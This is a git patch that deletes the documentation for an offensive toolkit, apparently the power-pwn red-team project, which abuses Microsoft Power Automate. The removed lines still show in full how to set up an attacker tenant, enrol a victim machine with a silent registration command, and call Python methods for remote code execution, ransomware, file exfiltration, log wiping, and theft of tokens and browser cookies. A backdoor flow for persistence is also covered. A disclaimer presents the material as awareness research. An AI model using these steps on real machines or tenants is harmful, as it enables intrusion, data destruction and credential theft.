From b6e2348e3ff7eb0ef6cd611228ab327d9c60d8d6 Mon Sep 17 00:00:00 2001 From: mbrg <11074433+mbrg@users.noreply.github.com> Date: Thu, 27 Jul 2023 14:40:26 +0300 Subject: [PATCH] remove docs --- docs/machinepwn/cloud_setup.md | 53 --------------------------- docs/machinepwn/infect_machine.md | 7 ---- docs/machinepwn/machine_pwn.md | 59 ------------------------------- docs/machinepwn/setup.txt | 27 -------------- docs/machinepwn/troubleshoot.md | 8 ----- docs/powerdoor/readme.md | 36 ------------------- 6 files changed, 190 deletions(-) delete mode 100644 docs/machinepwn/cloud_setup.md delete mode 100644 docs/machinepwn/infect_machine.md delete mode 100644 docs/machinepwn/machine_pwn.md delete mode 100644 docs/machinepwn/setup.txt delete mode 100644 docs/machinepwn/troubleshoot.md delete mode 100644 docs/powerdoor/readme.md diff --git a/docs/machinepwn/cloud_setup.md b/docs/machinepwn/cloud_setup.md deleted file mode 100644 index 2c602f6..0000000 --- a/docs/machinepwn/cloud_setup.md +++ /dev/null @@ -1,53 +0,0 @@ -# How to set up your power-pwn cloud account - -### Set up a malicious Microsoft tenant - -1. Set up your free Microsoft tenant by following [Microsoft guidelines](https://docs.microsoft.com/en-us/azure/active-directory/verifiable-credentials/how-to-create-a-free-developer-account) - - ![Pwntoso tenant](assets/pwntoso.png) - -2. Create a malicious user account and assign it a _Power platform administrator_ role. The admin role isn't necessary, it's just convenient. - - ![Power platform administrator role](assets/power_platform_admin.png) - -3. On a private browser tab - - 1. Go to https://flow.microsoft.com and log in with the malicious user. Follow through the sign-in process to initiate a Power Automate trial license. - - 2. Follow the same process with https://make.powerapps.com to initiate a Power Apps trial license. - -4. Create a Service Principal by following [Microsoft guidelines](https://docs.microsoft.com/en-us/power-automate/desktop-flows/machines-silent-registration#using-a-service-principal-account) and note the _tenantId_, _applicationId_ and _secret_. - -### Infect a test victim machines - -1. Infect a test machine by following the [How to infect a victim machine guide](infect_machine.md). - -2. Verify that the machine has been onboarded - - 1. Log into https://flow.microsoft.com as the malicious user - - 2. Click Go to _Monitor_ and then _Machines_ and verify that the test victim machine is there - - ![Victim machines](assets/victim_machines.png) - -### Upload pwntoso to your Power Automate cloud environment - -1. Log into https://flow.microsoft.com with the malicious user. - -2. Go to _Solutions_ and click _Import solution_ - - ![Import pwntoso solution](assets/import_solution.png) - -3. Zip the content of [pwntoso_1_0_0_1](../src/malicious_msft/solution/pwntoso_1_0_0_1) and select it when asked to provide a solution file. Follow the guided process to completion. - - 1. When asked to provide a connection, following the guided process to create a new machine connection. Use the test victim machine credentials. - -4. Go to _My flows_ and search for _Endpoint_ - - ![Endpoint flow](assets/endpoint_flow.png) - - Click on _Edit_ and then on _When a HTTP request is received_ and copy the URL under _HTTP POST URL_ - - ![HTTP Post URL](assets/post_url.png) - -5. Note the _HTTP Post URL_ for use with the Python module. \ No newline at end of file diff --git a/docs/machinepwn/infect_machine.md b/docs/machinepwn/infect_machine.md deleted file mode 100644 index 44b2c1b..0000000 --- a/docs/machinepwn/infect_machine.md +++ /dev/null @@ -1,7 +0,0 @@ -# How to infect a victim machine - -To register a victim machine, recall the __, __ and __ you got from following the [cloud setup guide](cloud_setup.md) and run the following command - - `echo | C:\Program Files (x86)\Power Automate Desktop\PAD.MachineRegistration.Silent.exe -register -applicationid -tenantid -clientsecret -force` - -That's it! For troubleshooting, refer to [Microsoft Docs](https://docs.microsoft.com/en-us/power-automate/desktop-flows/machines-silent-registration#silently-register-a-new-machine). diff --git a/docs/machinepwn/machine_pwn.md b/docs/machinepwn/machine_pwn.md deleted file mode 100644 index d59b5e9..0000000 --- a/docs/machinepwn/machine_pwn.md +++ /dev/null @@ -1,59 +0,0 @@ -## Usage - -```python -from powerpwn.machinepwn.machine_pwn import MachinePwn - -POST_URL = "" -pp = MachinePwn(post_url=POST_URL) - -### code execution - -# python2 -pp.exec_py2("print('hello world')").cmd_code_execution -# CodeExecOutputs(ScriptOutput='\ufeffhello world\r\n', ScriptError='') - -# python2 bad syntax -pp.exec_py2("bad syntax").cmd_code_execution -# CodeExecOutputs(ScriptOutput='', ScriptError=' File "", line 1\r\n bad syntax\r\n ^\r\nSyntaxError: unexpected token \'syntax\'') - -# powershell -pp.exec_ps("Write-Host \"hello word\"").cmd_code_execution - -# commandline -pp.exec_cmd("echo \"hello word\"").cmd_code_execution -# CodeExecOutputs(ScriptOutput='Microsoft Windows [Version 10.0.22000.795]\r\n(c) Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Program Files (x86)\\Power Automate Desktop>echo "hello word"\r\n"hello word"\r\n\r\n', ScriptError='') - -### ransomware - -pp.ransomware(crawl_depth=2, dirs_to_init_crawl=["C:\\Users\\alexg\\Documents\\mystuff", "D:\\shh"], encryption_key="8d1d4245").cmd_ransomware -# Ransomware=RansomwareOutputs(FilesFound=9, FilesAccessed=9, FilesProcessed=9, Errors='') - -### exfiltration - -pp.exfil(target="C:\\Users\\alexg\\Downloads\\takeit.txt").cmd_exfiltration -# ExfiltrationOutputs(Success=True, FileContents='asd') -pp.exfil(target="C:\\Users\\alexg\\Downloads\\dontexist.txt").cmd_exfiltration -# ExfiltrationOutputs(Success=False, FileContents='') - -### cleanup - -pp.cleanup().cmd_cleanup -# CleanupOutputs(FilesFound=179, LogFilesDeleted=178) - -### steal_power_automate_token - -pp.steal_power_automate_token().cmd_steal_power_automate_token -# StealPowerAutomateTokenOutputs(Token='ey...') - -### steal_cookie -pp.steal_cookie("https://www.google.com").cmd_steal_cookie -# StealCookieOutputs(Cookie='1P_JAR=2022-07-16-13; OGPC=19027681-1:') -``` - -## How To - -[How to set up your Power Pwn cloud environment](cloud_setup.md) - -[How to infect a victim machine](infect_machine.md) - -[How to troubleshoot execution errors](infect_machine.md) diff --git a/docs/machinepwn/setup.txt b/docs/machinepwn/setup.txt deleted file mode 100644 index b19f69a..0000000 --- a/docs/machinepwn/setup.txt +++ /dev/null @@ -1,27 +0,0 @@ -Create a new AAD tenant -Create a new user on that tenant and make them global admin -Turn off security default -Get an E3 license trial -Got to Power Automate -> Monitor > Machine, and set up a new Dataverse -Go to Desktop flow runs -> start trial - -Win 11 ent -Power Automate Desktop was already there. Did need an update. -Sign in w/ attacker creds -Machine-runtime app is not installed. So you can only build things by default, not run them remotely. Actually, cannot even run them. -Need to create an env per victim otherwise they see each other. -Reuse session (on cloud) - -https://powerautomate.microsoft.com/en-us/blog/use-power-automate-self-assisted-premium-trials-to-run-both-attended-and-unattended-rpa/ -two trials -assign to user and to env - -unicode -AES -padding PKCS7 -key size 256b -salt / init vector -https://docs.microsoft.com/en-us/power-automate/desktop-flows/actions-reference/cryptography#encryptfromfileaction - -prevent cleanup -https://docs.microsoft.com/en-us/power-automate/desktop-flows/governance#configure-power-automate-for-desktop-to-prevent-cleaning-up-of-run-files \ No newline at end of file diff --git a/docs/machinepwn/troubleshoot.md b/docs/machinepwn/troubleshoot.md deleted file mode 100644 index 290ff25..0000000 --- a/docs/machinepwn/troubleshoot.md +++ /dev/null @@ -1,8 +0,0 @@ -# How to troubleshoot execution errors - -## SessionExistsForTheUserWhenUnattended - -Got `success=False` with `code=SessionExistsForTheUserWhenUnattended` in `unattendedError`? - -Got to _Machines_ -> locate the machine -> three vertical dots -> _Edit details_ -> _Reuse sessions for unattended runs_. -See [reuse sessions for unattended runs](https://go.microsoft.com/fwlink/?linkid=2187511) diff --git a/docs/powerdoor/readme.md b/docs/powerdoor/readme.md deleted file mode 100644 index 4a17289..0000000 --- a/docs/powerdoor/readme.md +++ /dev/null @@ -1,36 +0,0 @@ -# Backdoor Flow - -[![stars](https://img.shields.io/github/stars/mbrg?icon=github&style=social)](https://github.com/mbrg) -[![twitter](https://img.shields.io/twitter/follow/mbrg0?icon=twitter&style=social&label=Follow)](https://twitter.com/intent/follow?screen_name=mbrg0) -[![email me](https://img.shields.io/badge/michael.bargury-owasp.org-red?logo=Gmail)](mailto:michael.bargury@owasp.org) - -Backdoor Flow is a demo showing how to maintain persistency on Power Platform by installing an automation factory that creates, executes and deletes arbitrary commands. - -Power Pwn - -Disclaimer: these materials are presented from an attacker’s perspective with the goal of raising awareness to the risks of underestimating the security impact of No Code/Low Code. No Code/Low Code is awesome. - -## Usage -**As a python package** - -```python -from powerpwn.powerdoor.backdoor_flow import BackdoorFlow -from powerpwn.powerdoor.samples.forward_email_backdoor_flow import SAMPLE_FLOW -POST_URL = "" -factory = BackdoorFlow(post_url=POST_URL) - -flow = factory.create_flow( - environment_id=SAMPLE_FLOW["environment"], - flow_display_name=SAMPLE_FLOW["flowDisplayName"], - flow_definition=SAMPLE_FLOW["flowDefinition"], - flow_state=SAMPLE_FLOW["flowState"], - connection_references=EXAMPLE["connectionReferences"] -) - -factory.delete_flow(environment_id=SAMPLE_FLOW["environment"], flow_id=flow["name"]) -``` - -**From powerpwn cli** -* Run `powerpwn exec --help` to get all available commands. -* To create flow run `powerpwn exec create-flow -e {environment-id} -webhook-url {url to installed factory} -i {full path to input}` - * You can find an example to input file in samples/sample_backdoor_flow_cli_input.json